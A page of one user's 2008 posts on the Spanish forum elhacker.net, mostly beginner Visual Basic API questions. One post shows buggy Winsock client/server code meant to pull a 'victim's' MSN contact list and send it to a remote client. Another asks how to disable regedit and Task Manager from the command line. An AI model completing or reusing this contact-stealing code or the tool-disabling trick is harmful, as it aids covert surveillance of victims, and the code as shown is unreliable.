elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17
71  Programación / Programación Visual Basic / ayuda con el Winsock y envio de contactos en: 20 Abril 2008, 22:24 pm
saludos, bueno miren tengo este problema, es el siguiente....

Estoy haciendo un programa que me permite desde el cliente al darle a un command1 este envie por el Ws(Winsock) un dato o orden por decirlo asi, ahora que en el server cuando llegue este cheke si es el dato, pongan que es car, entonces el server ve si es car entonces este lista TODOS los contactos del MSN de la persona en una variable y los envia al cliente y el cliente comprueba que ese dato enviado contiene los contactos y los lista en un listbox ahora... este code esta correcto?

CLIENTE

Código:
Private sub Command1_Click()
ws.SendData car
End sub

SERVER

Código:
Private sub ws_DataArribal(LoQueVaAquixD)
dim dato as string
dim cont as long
dim user as IMessengerContact

ws.getdata dato
if dato = car then
for each user in MsgrUIA.MyContacts
cont = user.SigningName & "|"
next
end if
ws.SendData cont
end sub

CLIENTE


Código:
Private sub ws_DataArribal(LoQueVaAkixD)
dim datos as string
din contactos() As string

ws.GetData datos
if datos = cont then
contactos = Split(datos, "|")
for i = UBound(contactos) to LBound(Contactos)
List1.additem contactos(i)
next
end if
end sub

Sabiendo que lo que hace el code del server es enviar los contactos de la victima al cliente, este los esplitea y los lista en un listbox, ahora es correcto ese code?? y si no  lo es en que me he equivocado y como lo podria solucionar?...
72  Programación / Scripting / Re: [+] Skull Bat's Editor V 0.1 |By-Skull| en: 19 Abril 2008, 03:07 am
jaja ta bueno el programa sobre todo para aquellos que comienzan! ;)
73  Programación / Programación Visual Basic / Re: Ayuda con el parametro de esta API? en: 19 Abril 2008, 02:15 am
Hombre! mil gracias!!! no sabia lo del Spy! se que esto como a mi, le va a servir a muchisimas personas! ;)
74  Programación / Programación Visual Basic / Ayuda con el parametro de esta API? en: 18 Abril 2008, 23:52 pm
hola gente bueno esta es mi duda trabajo con la API FindWindow, pues esta tiene un parametro, que es:

lpClassName Nombre de la clase de la ventana a buscar

pero como hago para saber el IpClassName de las ventanas? osea como lo puedo obtener?

Grax!
75  Programación / Programación Visual Basic / Re: Ayuda con sendmessage en: 17 Abril 2008, 05:24 am
no pues era para conocimientos básicos  conocer mejor esas constantes sabes algún lugar donde pueda encontrar varias de estas constantes, o mejor dicho... Un lugar en espanol donde me enseñen el correcto uso de está API?
76  Programación / Programación Visual Basic / Ayuda con sendmessage en: 17 Abril 2008, 03:47 am
hola bueno está es mi duda en el sendmessage hay un parámetro el segundo primero viene el hwnd, pues hay se pone cierto valor pero como se que es ese valor y como uso ese
valor?
77  Programación / Programación Visual Basic / Sera que alguien me puede explicar estas APIs que no estoy claro? en: 15 Abril 2008, 20:41 pm
hola, bueno amigos disculpenme, este es mi problema voy a trabajar con el portapapeles y voy a utilizar ciertas APIs lo que pasa es que busque info sobre ellas pero la info que me aparecio mayormente esta en ingles, y desgraciadamente no se hablar en ingles, a ver si alguien me podria facilitar alguna pagina en español que me expliquen como utilizarlas? o si me puedieran explicar, se que soy necio, y disuclpen!

Private Declare Function OpenClipboard Lib "user32" (ByVal hWnd As Long) As Long
Private Declare Function CloseClipboard Lib "user32" () As Long
Private Declare Function EmptyClipboard Lib "user32" () As Long
Private Declare Function SetClipboardData Lib "user32" (ByVal wFormat As Long, ByVal hMem As Long) As Long
Private Declare Sub CopyMem Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)


pues estas son, a ver si me podrrian facilitar algo gracia!
78  Programación / Programación Visual Basic / Re: [+] Skull MSN Man. V 0.2 Actualizado 9/04/08!! en: 13 Abril 2008, 21:22 pm
Citar
Una pregunta, ¿que significa nudgear?

nudgear es como enviar muchos Zumbidos
79  Programación / Scripting / Re: como peudo deshabilitar el regedit y el taskman desde el cmd en: 11 Abril 2008, 22:50 pm
hey no encuentro la manera! porfavor! ya busque en el reg add pero intento e intento y me dice que no se puede! :S
80  Programación / Programación Visual Basic / Re: [+] Skull MSN Man. V 0.2 Actualizado 9/04/08!! en: 10 Abril 2008, 19:08 pm
jeje man ta chulo al fina sacas esta version! :P la estaba esperandoO! felicitaciones esta de lujo si encuentro algo te aviso! ;)
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines